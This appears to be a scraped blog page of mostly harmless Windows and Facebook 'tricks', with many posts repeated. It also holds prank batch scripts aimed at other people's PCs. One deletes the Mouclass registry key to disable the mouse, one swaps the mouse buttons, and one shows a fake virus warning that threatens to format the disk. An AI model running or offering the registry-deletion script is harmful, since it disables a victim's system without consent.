Showing posts with label Funny. Show all posts
Showing posts with label Funny. Show all posts
Monday, 29 July 2013
Tagged under: Funny, pc tricks
Hi friends , smartphones are famous for their pattern lock software. If you are already using any smartphone then you know what is pattern lock and if you really like it then you can now install it on your windows PC too. Now you thinking , it is interesting to do but how can you implement it then here are some steps available for you to install pattern lock on your windows pc
STEP 1.
First of all you have to download & install XUS PC LOCK to your PC
STEP 2.
Now set a pattern to unlock your screen
STEP 3.
Now you'll get a icon on your desktop as well as in notification area as shown in below screenshot.
STEP 4.
Now it will automatically lock your PC when it is not in use like in your smartphone, you can unlock it using pattern which you set in step 2.
" ENJOY & WAIT FOR NEXT "
HOW TO INSTALL PATTERN LOCK IN WINDOWS
Hi friends , smartphones are famous for their pattern lock software. If you are already using any smartphone then you know what is pattern lock and if you really like it then you can now install it on your windows PC too. Now you thinking , it is interesting to do but how can you implement it then here are some steps available for you to install pattern lock on your windows pc
STEP 1.
First of all you have to download & install XUS PC LOCK to your PC
STEP 2.
Now set a pattern to unlock your screen
STEP 3.
Now you'll get a icon on your desktop as well as in notification area as shown in below screenshot.
STEP 4.
Now it will automatically lock your PC when it is not in use like in your smartphone, you can unlock it using pattern which you set in step 2.
" ENJOY & WAIT FOR NEXT "
Tagged under: Funny, internet
HOW TO MAKE YOUTUBE DANCE
Hey friends, till now we have discussed a lot of tricks regarding Google, like some easter eggs, rainbow and lots of other pranks here and there. Today is the YouTube`s turn. Today we will show you how to make YouTube do the dance.
Here is the magic:
^_^
Here is the magic:
- Open up YouTube.
- Now, type the following in search :
Do the Harlem Shake
- Wait till the script loads, and after some time, it starts dancing, like this:
Have fun with this trick and don`t forget to share with friends.
HAVE A TRICKY DAY!!!
^_^
Tuesday, 28 May 2013
Tagged under: Funny, internet, pc tricks
Simple Trick To Use Web Browsers As Text Editor
In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.
How To Do ?
1 Copy below code in browser Url section.
data:text/html, <html contenteditable>
2. Now Press Enter.
3. Now you can type anything as would do on any other text editor like Notepad.
4. To save your Text file Press Ctrl + S and save it as anything.txt (.txt Is Must)
3. Now you can type anything as would do on any other text editor like Notepad.
4. To save your Text file Press Ctrl + S and save it as anything.txt (.txt Is Must)
thats all. ^_^
Saturday, 5 January 2013
Tagged under: .Bat Tricks, Dangerous, Funny, pc tricks
Open Notepad (Start > All Programs > Accessories > Notepad).
Copy the code and paste it in notepad.
Mouse:
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
Disable Mouse/Keyboard
Mouse:
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
Sunday, 16 December 2012
Tagged under: Funny, pc tricks
A GodMode provides a single place to access all Windows settings without needing to browse options and folders in the Control Panel.
To activate a God-Mode in Windows Vista/ Windows 7:
Activate GodMode in Windows Vista/Windows7
A GodMode provides a single place to access all Windows settings without needing to browse options and folders in the Control Panel.
To activate a God-Mode in Windows Vista/ Windows 7:
- Create a new Folder
- Right-click and rename the folder with this name:
Thursday, 6 December 2012
Saturday, 1 December 2012
Tagged under: .Bat Tricks, Funny, pc tricks
Today i will be showing you an interesting trick which will let yourkeyboard led light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started
How to do that ?
1. Open Notepad and copy below codes into it.
Keyboard Dancing Led Light Trick
Today i will be showing you an interesting trick which will let yourkeyboard led light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started
How to do that ?
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
Tagged under: Dangerous, Funny, pc tricks
Swapping the Mouse Keys
One of the simplest pranks, best used in conjunction with another. All it does is swap the right and left buttons on your mouse.
Open Notepad
@ echo off
rem ---------------------------------
rem Swap mouse button
RUNDLL32 USER32.DLL,SwapMouseButton
Open Notepad
@ echo off
rem ---------------------------------
rem Swap mouse button
RUNDLL32 USER32.DLL,SwapMouseButton
Friday, 30 November 2012
Friday, 23 November 2012
Tagged under: Funny, pc tricks
CHANGE DRIVE ICONS
First of all copy a icon file to the root of the drive.
example: c:\icon.ico
Then create a file called: autorun.inf in c:\autorun.inf
then open that file and type the following:
Wednesday, 21 November 2012
Tagged under: Facebook, Funny, internet, pc tricks
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
HOW TO POST COLORFUL ALPHABET EMOTIONS ON FACEBOOK CHAT
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
Sunday, 18 November 2012
Tagged under: Funny, pc tricks
Dear Friends,
If you are keen to change the look of your every part of your computer than this is the article for you !
This very simple but still many of us are not aware of this thing!
Now lets come to the point:
Here is the very common and very simple trick to change the icon of your removable drive.
To change the icon just follow the given steps as under:
1] first select your icon file or download it from the net. If you are creating your own file than remember that it should be 34*34 pixels. Otherwise look will be clumsy.
Change the Icons of Removable Drives
Dear Friends,
If you are keen to change the look of your every part of your computer than this is the article for you !
This very simple but still many of us are not aware of this thing!
Now lets come to the point:
Here is the very common and very simple trick to change the icon of your removable drive.
To change the icon just follow the given steps as under:
1] first select your icon file or download it from the net. If you are creating your own file than remember that it should be 34*34 pixels. Otherwise look will be clumsy.
Tagged under: .Bat Tricks, Funny, pc tricks
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Make frnds scare for VIRUS
Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
Saturday, 17 November 2012
Thursday, 15 November 2012
Tagged under: Facebook, Funny, internet, pc tricks
This is one of the coolest Facebook tricks because it not only makes your status update change color, but it also turns it into a link where does the link lead you ask? It leads to the profile page of the person who clicked it, so you can actually troll your friends with this trick.
How to Make your facebook status 'BLUE'
This is one of the coolest Facebook tricks because it not only makes your status update change color, but it also turns it into a link where does the link lead you ask? It leads to the profile page of the person who clicked it, so you can actually troll your friends with this trick.
Write the following line in your status update:
@@[1:[0:1: write here ]]
Replace the write here text with any text you wish to become blue. You can add more text before or after the code, to make this look even cooler.
Post the Facebook status :)
Wednesday, 14 November 2012
Tagged under: .Bat Tricks, Funny, pc tricks
Create your own Game using Notepad
We can create some games using nothing but only the notepad!
@echo off
title ScrewTheLotOfYou's Tic Tac Toe
title Noughts and Crosses
setlocal enabledelayedexpansion
::~ ^^^ Stops all commands appearing on screen, sets the title and enables the use of ! for environment variable
:menu
cls
echo Main Menu
echo To Play A 1-Player Game, Enter 1
echo To Play A 2-Player Game, Enter 2
echo To Exit, Enter 3
set /p menu=
- Open Notepad (Start > All Programs > Accessories > Notepad).
- Copy the code and paste it in notepad.
@echo off
title ScrewTheLotOfYou's Tic Tac Toe
title Noughts and Crosses
setlocal enabledelayedexpansion
::~ ^^^ Stops all commands appearing on screen, sets the title and enables the use of ! for environment variable
:menu
cls
echo Main Menu
echo To Play A 1-Player Game, Enter 1
echo To Play A 2-Player Game, Enter 2
echo To Exit, Enter 3
set /p menu=
Tagged under: .Bat Tricks, Funny, pc tricks
@echo off
cls
:a
cls
color 04
echo *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** ***
ping localhost -n 1 >nul
echo *** ***
ping localhost -n 1 >nul
echo *** ***
Create a Simple Animation through Notepad
- Open Notepad(Start > All Programs > Accessories > Notepad).
- Copy the following code and paste it in notepad.
@echo off
cls
:a
cls
color 04
echo *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** *** ***
ping localhost -n 1 >nul
echo *** *** ***
ping localhost -n 1 >nul
echo *** ***
ping localhost -n 1 >nul
echo *** ***
Subscribe to:
Comments (Atom)














